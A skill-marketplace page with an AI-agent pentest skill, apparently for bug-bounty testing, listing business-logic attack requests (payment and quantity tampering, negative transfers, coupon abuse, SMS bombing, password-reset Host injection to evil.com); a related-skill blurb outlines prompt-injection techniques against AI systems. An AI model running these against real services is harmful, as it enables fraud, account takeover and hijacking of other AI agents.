원클릭으로 Manus에서 모든 스킬 실행

business-logic-attack

Web 应用业务逻辑漏洞检测与利用。当目标有支付/交易/订单/优惠券/积分/余额/充值/转账/购物车等商业功能时使用。当发现用户注册/登录/短信验证码/邮箱验证/密码重置等账户功能时使用。当 API 请求中出现价格(price/amount)、数量(quantity/count)、订单号(order_id)、优惠码(coupon/promo)等业务参数时使用。业务逻辑漏洞不需要技术漏洞（SQLi/XSS），而是利用应用流程设计缺陷——负数金额、0元支付、订单状态篡改、验证码复用、并发竞争。SRC 众测和实战渗透中最高频的漏洞类型之一，每个有交易功能的应用都应检查

Manus에서 실행

개요

설치 명령

npx skills add https://github.com/hanc00l/nemo-agent-v1 --skill business-logic-attack

이 명령을 Claude Code에 복사하여 붙여넣어 스킬을 설치하세요

출처

hanc00l/nemo-agent-v1

스타38

포크4

업데이트2026년 4월 16일 23:52

SKILL.md

readonly

name	business-logic-attack
description	Web 应用业务逻辑漏洞检测与利用。当目标有支付/交易/订单/优惠券/积分/余额/充值/转账/购物车等商业功能时使用。当发现用户注册/登录/短信验证码/邮箱验证/密码重置等账户功能时使用。当 API 请求中出现价格(price/amount)、数量(quantity/count)、订单号(order_id)、优惠码(coupon/promo)等业务参数时使用。业务逻辑漏洞不需要技术漏洞（SQLi/XSS），而是利用应用流程设计缺陷——负数金额、0元支付、订单状态篡改、验证码复用、并发竞争。SRC 众测和实战渗透中最高频的漏洞类型之一，每个有交易功能的应用都应检查
metadata	{"tags":"business logic,支付,payment,订单,order,优惠券,coupon,积分,balance,越权,短信轰炸,验证码,逻辑漏洞,0元购,负数,篡改","category":"exploit"}

业务逻辑漏洞方法论

业务逻辑漏洞的本质是：应用在服务端没有正确校验业务规则，导致攻击者可以通过修改请求参数来违反预期的业务流程。这类漏洞 WAF 和自动化扫描器几乎无法检测——因为每个请求看起来都是"正常"的 HTTP 请求。

Phase 0: 攻击面识别

先通读应用功能，找到所有涉及"状态变化"或"价值转移"的操作：

功能类型	关注点	典型漏洞
支付/购买	price/amount/total 参数	金额篡改、0元购、负数退款
优惠券/促销	coupon/promo/discount	复用、枚举、叠加
积分/余额	points/balance/credits	负数充值、并发消费
订单流程	order_id/status/step	状态跳转、重复操作
短信/邮箱验证	phone/email/code	轰炸、爆破、绕过
密码重置	token/code/user_id	任意用户重置
用户注册	role/type/is_admin	角色注入（→ privilege-escalation-web）
文件/资源操作	file_id/doc_id	越权访问（→ idor-methodology）

Phase 1: 支付与交易

1.1 金额篡改

拦截支付请求，修改 price/amount/total 参数：

原始: POST /api/pay {"order_id":"123","amount":9999}
测试: POST /api/pay {"order_id":"123","amount":1}
测试: POST /api/pay {"order_id":"123","amount":0}
测试: POST /api/pay {"order_id":"123","amount":-1}
测试: POST /api/pay {"order_id":"123","amount":0.01}

重点检查：

服务端是否用客户端传来的金额，还是从数据库查询商品价格
负数金额是否会导致退款到账户余额
小数精度问题（0.001 元能否通过校验）

1.2 数量篡改

原始: {"product_id":"A","quantity":1,"price":100}
测试: {"product_id":"A","quantity":0,"price":100}    → 0元购？
测试: {"product_id":"A","quantity":-1,"price":100}   → 退款？
测试: {"product_id":"A","quantity":99999,"price":100} → 溢出？

1.3 订单状态篡改

正常流程: 待支付(0) → 已支付(1) → 已发货(2) → 已完成(3)
攻击: 直接发 status=1 跳过支付
攻击: 已完成后再发 status=0 重新获取商品
攻击: 修改其他用户的订单状态

1.4 支付回调伪造

第三方支付（支付宝/微信/Stripe）回调通常是 POST 到应用的 notify_url：

检查回调是否验证签名
是否可以修改 total_amount 字段
是否可以重放回调请求（重复到账）
是否可以用测试环境的支付结果通知正式环境

Phase 2: 优惠券与积分

2.1 优惠券滥用

# 同一优惠码多次使用
POST /api/coupon/apply {"code":"SAVE50"} → 重复发送

# 优惠码枚举（如果格式可预测）
PROMO001, PROMO002, PROMO003...

# 多优惠券叠加
POST /api/coupon/apply {"codes":["SAVE50","WELCOME20"]}

# 负折扣
POST /api/coupon/apply {"discount":-100}

2.2 积分/余额操作

# 转账负数
POST /api/transfer {"to":"victim","amount":-100}

# 并发充值竞争 → 与 race-condition-methodology 配合
# 积分兑换精度问题（取整方向是否可利用）

Phase 3: 验证码与认证

3.1 短信验证码

# 短信轰炸：同一号码无频率限制
# 验证码爆破：4-6 位数字穷举
# 验证码复用：验证成功后 code 未失效
# 验证码泄露：响应中返回了 code
# 手机号参数污染：
POST /api/sms/send {"phone":["13800138000","attacker_phone"]}

3.2 密码重置漏洞

# 任意用户密码重置 — 修改 user_id/email
POST /api/reset {"token":"valid_token","user_id":"victim_id","password":"hacked"}

# Host 头注入 — 重置链接指向攻击者域名
POST /api/forgot  Host: evil.com  {"email":"victim@target.com"}

3.3 登录逻辑

# 账户锁定绕过 — 大小写/空格/unicode 变体
# 响应差异枚举 — "用户名不存在" vs "密码错误"

Phase 4: 流程跳过

4.1 多步骤操作跳过

正常: Step1(填信息) → Step2(验证) → Step3(提交)
攻击: 直接请求 Step3 的 API，跳过验证步骤

4.2 前端校验绕过

所有前端校验都可通过抓包绕过——价格只读字段、按钮 disabled、下拉限制选项。

通用测试清单

✅ 所有价格/金额参数: 改为 0、负数、极大值、小数
✅ 所有数量参数: 改为 0、负数、极大值
✅ 所有状态参数: 尝试跳转、回退、重复
✅ 所有 ID 参数: 替换为其他用户/订单的 ID (→ IDOR skill)
✅ 所有验证码: 复用、爆破、轰炸
✅ 所有优惠券: 复用、枚举、叠加
✅ 所有多步骤操作: 跳过中间步骤
✅ 并发请求: 余额消费、优惠券使用 (→ race-condition skill)

이 저장소의 다른 Skills

같은 저장소

adcs-attack

hanc00l/nemo-agent-v1

AD CS 证书服务攻击 - ADCS ESC1-ESC8 + ADCSKiller 自动化利用

2026-04-1738

exchange-to-domain

hanc00l/nemo-agent-v1

Exchange 服务器到域控提权 - CVE-2018-8581 Exchange2Domain 攻击链

2026-04-1738

auxiliary

hanc00l/nemo-agent-v1

辅助技能集合 - 从 AboutSecurity 项目整合的高级渗透测试技能

2026-04-1738

pentest

hanc00l/nemo-agent-v1

渗透测试技能集合 - 覆盖三个赛区的综合渗透测试能力

2026-04-1738

prompt-injection

hanc00l/nemo-agent-v1

AI/LLM 间接 Prompt 注入攻击。当目标 AI 系统会处理外部数据源（网页、文档、邮件、数据库、API 返回、用户评论）时使用。覆盖间接注入(通过网页/文档/图片嵌入指令)、工具链劫持(让Agent调用危险工具)、RAG投毒(向知识库注入恶意内容)、跨插件攻击(利用多工具交互)、数据外泄(通过markdown图片/链接泄露对话)。与 prompt-jailbreak 的区别：jailbreak 直接操纵用户输入，injection 通过第三方数据源间接注入指令。发现目标 Web 应用集成了 AI 聊天、AI 搜索、RAG 知识库、AI Agent 或任何 LLM 功能时都应使用此 skill

2026-04-1638

cloud-metadata

hanc00l/nemo-agent-v1

云元数据利用。当通过 SSRF 或已获取的 shell 可以访问云实例元数据服务时使用。覆盖 AWS/Azure/GCP/阿里云/腾讯云的元数据端点、IAM/CAM 凭据提取、IMDSv2 绕过、从元数据到云服务枚举的完整攻击链。发现任何 SSRF 场景、内网可访问 169.254.169.254 或 100.100.100.200 的场景都应使用此技能

2026-04-1638

출처

hanc00l

hanc00l/nemo-agent-v1

GitHub 저장소 열기 Creator 저장소 보기

설치 명령

다운로드

Manus에서 실행

유용한 대상SOC

정보 보안 분석가컴퓨터 및 수학직15-1212L4

name	business-logic-attack
description	Web 应用业务逻辑漏洞检测与利用。当目标有支付/交易/订单/优惠券/积分/余额/充值/转账/购物车等商业功能时使用。当发现用户注册/登录/短信验证码/邮箱验证/密码重置等账户功能时使用。当 API 请求中出现价格(price/amount)、数量(quantity/count)、订单号(order_id)、优惠码(coupon/promo)等业务参数时使用。业务逻辑漏洞不需要技术漏洞（SQLi/XSS），而是利用应用流程设计缺陷——负数金额、0元支付、订单状态篡改、验证码复用、并发竞争。SRC 众测和实战渗透中最高频的漏洞类型之一，每个有交易功能的应用都应检查
metadata	{"tags":"business logic,支付,payment,订单,order,优惠券,coupon,积分,balance,越权,短信轰炸,验证码,逻辑漏洞,0元购,负数,篡改","category":"exploit"}

业务逻辑漏洞方法论

Phase 0: 攻击面识别

先通读应用功能，找到所有涉及"状态变化"或"价值转移"的操作：

功能类型	关注点	典型漏洞
支付/购买	price/amount/total 参数	金额篡改、0元购、负数退款
优惠券/促销	coupon/promo/discount	复用、枚举、叠加
积分/余额	points/balance/credits	负数充值、并发消费
订单流程	order_id/status/step	状态跳转、重复操作
短信/邮箱验证	phone/email/code	轰炸、爆破、绕过
密码重置	token/code/user_id	任意用户重置
用户注册	role/type/is_admin	角色注入（→ privilege-escalation-web）
文件/资源操作	file_id/doc_id	越权访问（→ idor-methodology）

Phase 1: 支付与交易

1.1 金额篡改

拦截支付请求，修改 price/amount/total 参数：

原始: POST /api/pay {"order_id":"123","amount":9999}
测试: POST /api/pay {"order_id":"123","amount":1}
测试: POST /api/pay {"order_id":"123","amount":0}
测试: POST /api/pay {"order_id":"123","amount":-1}
测试: POST /api/pay {"order_id":"123","amount":0.01}

重点检查：

服务端是否用客户端传来的金额，还是从数据库查询商品价格
负数金额是否会导致退款到账户余额
小数精度问题（0.001 元能否通过校验）

1.2 数量篡改

原始: {"product_id":"A","quantity":1,"price":100}
测试: {"product_id":"A","quantity":0,"price":100}    → 0元购？
测试: {"product_id":"A","quantity":-1,"price":100}   → 退款？
测试: {"product_id":"A","quantity":99999,"price":100} → 溢出？

1.3 订单状态篡改

正常流程: 待支付(0) → 已支付(1) → 已发货(2) → 已完成(3)
攻击: 直接发 status=1 跳过支付
攻击: 已完成后再发 status=0 重新获取商品
攻击: 修改其他用户的订单状态

1.4 支付回调伪造

第三方支付（支付宝/微信/Stripe）回调通常是 POST 到应用的 notify_url：

检查回调是否验证签名
是否可以修改 total_amount 字段
是否可以重放回调请求（重复到账）
是否可以用测试环境的支付结果通知正式环境

Phase 2: 优惠券与积分

2.1 优惠券滥用

# 同一优惠码多次使用
POST /api/coupon/apply {"code":"SAVE50"} → 重复发送

# 优惠码枚举（如果格式可预测）
PROMO001, PROMO002, PROMO003...

# 多优惠券叠加
POST /api/coupon/apply {"codes":["SAVE50","WELCOME20"]}

# 负折扣
POST /api/coupon/apply {"discount":-100}

2.2 积分/余额操作

# 转账负数
POST /api/transfer {"to":"victim","amount":-100}

# 并发充值竞争 → 与 race-condition-methodology 配合
# 积分兑换精度问题（取整方向是否可利用）

Phase 3: 验证码与认证

3.1 短信验证码

# 短信轰炸：同一号码无频率限制
# 验证码爆破：4-6 位数字穷举
# 验证码复用：验证成功后 code 未失效
# 验证码泄露：响应中返回了 code
# 手机号参数污染：
POST /api/sms/send {"phone":["13800138000","attacker_phone"]}

3.2 密码重置漏洞

# 任意用户密码重置 — 修改 user_id/email
POST /api/reset {"token":"valid_token","user_id":"victim_id","password":"hacked"}

# Host 头注入 — 重置链接指向攻击者域名
POST /api/forgot  Host: evil.com  {"email":"victim@target.com"}

3.3 登录逻辑

# 账户锁定绕过 — 大小写/空格/unicode 变体
# 响应差异枚举 — "用户名不存在" vs "密码错误"

Phase 4: 流程跳过

4.1 多步骤操作跳过

正常: Step1(填信息) → Step2(验证) → Step3(提交)
攻击: 直接请求 Step3 的 API，跳过验证步骤

4.2 前端校验绕过

所有前端校验都可通过抓包绕过——价格只读字段、按钮 disabled、下拉限制选项。

通用测试清单

✅ 所有价格/金额参数: 改为 0、负数、极大值、小数
✅ 所有数量参数: 改为 0、负数、极大值
✅ 所有状态参数: 尝试跳转、回退、重复
✅ 所有 ID 参数: 替换为其他用户/订单的 ID (→ IDOR skill)
✅ 所有验证码: 复用、爆破、轰炸
✅ 所有优惠券: 复用、枚举、叠加
✅ 所有多步骤操作: 跳过中间步骤
✅ 并发请求: 余额消费、优惠券使用 (→ race-condition skill)